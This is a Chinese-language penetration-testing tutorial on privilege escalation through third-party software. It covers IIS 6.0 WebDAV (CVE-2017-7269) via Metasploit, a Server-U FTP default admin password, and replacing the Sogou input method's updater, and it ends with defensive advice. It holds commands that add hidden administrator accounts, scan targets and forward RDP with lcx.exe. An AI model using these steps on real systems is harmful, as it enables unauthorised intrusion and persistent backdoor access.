Web安全 - 第三方软件提权技术详解

前言

提权是指攻击者通过各种方法和漏洞，提高在服务器中的权限级别，从而获得更大控制权的过程。在Web渗透中，初始获取的webshell权限通常有限，攻击者需要通过提权技术来扩展控制能力。

提权方法分类

1. 系统漏洞提权

   • 获取操作系统类型及版本
   • 搜索对应版本的exp
   • 尝试利用exp获取权限
   • 尝试反弹shell

2. 数据库提权

   • MySQL UDF提权
   • MOF提权
   • 反弹端口提权
   • 启动项提权

3. 第三方软件/服务提权

   • 利用第三方软件漏洞
   • 利用服务端口/协议漏洞

第三方软件提权详解

IIS 6.0 WebDAV漏洞提权(CVE-2017-7269)

提权流程：

1. 信息收集发现IIS 6.0开启WebDAV
2. 使用nmap扫描确认版本和漏洞：

   nmap -sV O 10.10.10.130
   nmap --script=vuln 10.10.10.130
   

3. 下载并部署exp：
   • 从GitHub获取CVE-2017-7269 exp
   • 复制到Metasploit模块目录
4. 执行攻击：

   use exploit/windows/iis/cve_2017_7269
   set RHOSTS 目标IP
   exploit
   

5. 获取meterpreter会话后上传提权工具：
   • 创建目录并上传iis62.exe
6. 执行提权命令：

   iis62.exe "net user su su123/add"
   iis62.exe "net localgroup administrators su /add"
   

7. 端口转发连接远程桌面：
   • 靶机执行：lcx.exe -slave 攻击机IP 4444 靶机IP 3389
   • 攻击机执行：lcx.exe -listen 4444 33891

Server-U FTP服务器提权

提权方法：

1. 默认凭据：

   • 用户名：LocalAdministrator
   • 密码：#l@$ak#.lk;0@P
   • 若修改过，可从serverAdmin.exe文件中查找

2. 利用步骤：

   • 上传webshell
   • 通过servu提权模块执行cmd命令
   • 添加系统用户：

     net user 用户名 密码 /add
     net localgroup administrators 用户名 /add
     

搜狗输入法提权

提权原理：

• 搜狗输入法自动更新功能未对更新程序做校验
• 可替换更新程序执行恶意代码

实施步骤：

1. 定位搜狗输入法安装路径（如D:\SogouInput）
2. 创建恶意bat文件并编译为PinyinUp.exe
3. 替换原PinyinUp.exe文件
4. 等待用户更新词库时触发执行
5. 成功添加系统用户

防御建议

1. IIS防御措施：

   • 关闭不必要的WebDAV功能
   • 及时更新IIS补丁
   • 限制上传和执行权限

2. Server-U防御措施：

   • 修改默认管理密码
   • 限制FTP用户权限
   • 禁用不必要的脚本执行功能

3. 输入法防御措施：

   • 关闭自动更新功能
   • 设置更新程序签名验证
   • 限制程序目录写入权限

4. 通用防御措施：

   • 定期更新所有第三方软件
   • 实施最小权限原则
   • 监控异常账户创建行为
   • 使用应用白名单机制

总结

第三方软件提权是Web渗透中常用的技术手段，攻击者利用广泛部署的软件中存在的漏洞来提升权限。防御方需要保持软件更新、限制权限并监控异常行为，才能有效防范此类攻击。